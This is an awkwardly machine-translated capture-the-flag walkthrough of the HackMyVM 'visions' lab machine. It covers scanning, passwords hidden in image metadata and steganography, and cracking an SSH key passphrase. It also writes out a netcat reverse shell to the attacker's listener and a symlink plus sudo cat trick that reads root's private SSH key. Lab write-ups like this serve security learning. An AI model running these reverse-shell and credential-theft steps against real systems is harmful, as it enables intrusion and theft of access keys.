Hackmyvm target series (3) -visions

One 、 information gathering

Probe network segment first , Get the target host

nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox

Then perform port scanning , Find out ssh Service and http service

nmap -sC -sV -p- 192.168.200.234

Visit http service , I found only one picture and a comment .

This comment looks like a hint ,aliccia Guess it may be a user

Use dirsearch Scan the directory , See what you can get

dirsearch -u http://192.168.200.234/ -e php,html,txt,bak,zip,7z,gz,db -x 404,301,500,502

However, there is nothing

According to its cue , Download the pictures , Check the metadata of the image

curl http://192.168.200.234/white.png -o white.png

./exiftool white.png

Pictured , Found the password

Tool usage and download ：

ExifTool Complete introduction guide

alicia:ihaveadream

Two 、 Exploit

Login successfully

I didn't find it in the current directory after I came in flag, After looking at the home directory, I found 4 Users , And then in sophia Found... In the directory flag, But I don't have permission , Can not run .

Then try raising the right first ？

sudo -l

It is found that the current user can emma Run as user nc Without using a password .

In that case , Then bounce first shell try .

kali On the listening port

Then execute the following command statement on the target machine

sudo -u emma nc 192.168.200.192 10000 -e /bin/bash

Successfully accepted shell, Use python Get an interactive shell

python -c 'import pty; pty.spawn("/bin/bash")'

Found a in the current directory note.txt file , The contents are as follows .

I can't help it ？？？ I don't know what it means .

Then I checked again suid and sudo Raise the right , There is no breakthrough .

Later I saw the boss's wp, I found that I need to use some image processing tools

StegOnline

After uploading the picture , Click the arrow .

Then you can see the user name and password , This question is true , The information is all hidden in this picture

sophia:seemstobeimpossible

Login successful

The current user can use any user's identity cat Command view .invisible file . This means that we use cat Command to view the file with root jurisdiction .

Open it up , Is the user isabella Your private key , Take it to login

I still have to enter the password .

We can only start blasting

have access to john the ripper Blasting , But first use the following command to id_rsa Convert to john Recognable hash value

python3 /usr/share/john/ssh2john.py id_rsa > crack.txt

I use script here to explode .

rockyou.txt yes kali A dictionary comes with you ,/usr/share/wordlists/rockyou.txt.gz, You need to decompress it before using , Otherwise, there will be confusion

gzip -d rockyou.txt.gz

Successfully burst the password ( Password in 1 More than ten thousand lines , But here because of writing wp I put it in front )

invisible

Pictured , Login successful

Start from below , Because of changing a network , So this IP Changed

3、 ... and 、 Elevated privileges

Here to see if there are any orders that can be used to raise power

However, there is no breakthrough

Then suddenly remembered before sophia The user to use cat Command read .invisible The file has root The powers of the , Can I use isabella Users will .invisiblla Users link to root The user's private key goes up ？

Create soft link

ln -sf /root/.ssh/id_rsa .invisible

Read root User's private key

sudo cat /home/isabella/.invisible

There will be a small problem when logging in with the private key , Too high permission will cause login failure .

Reduce permissions , Log in again

chmod 600 key

Login successful , get root jurisdiction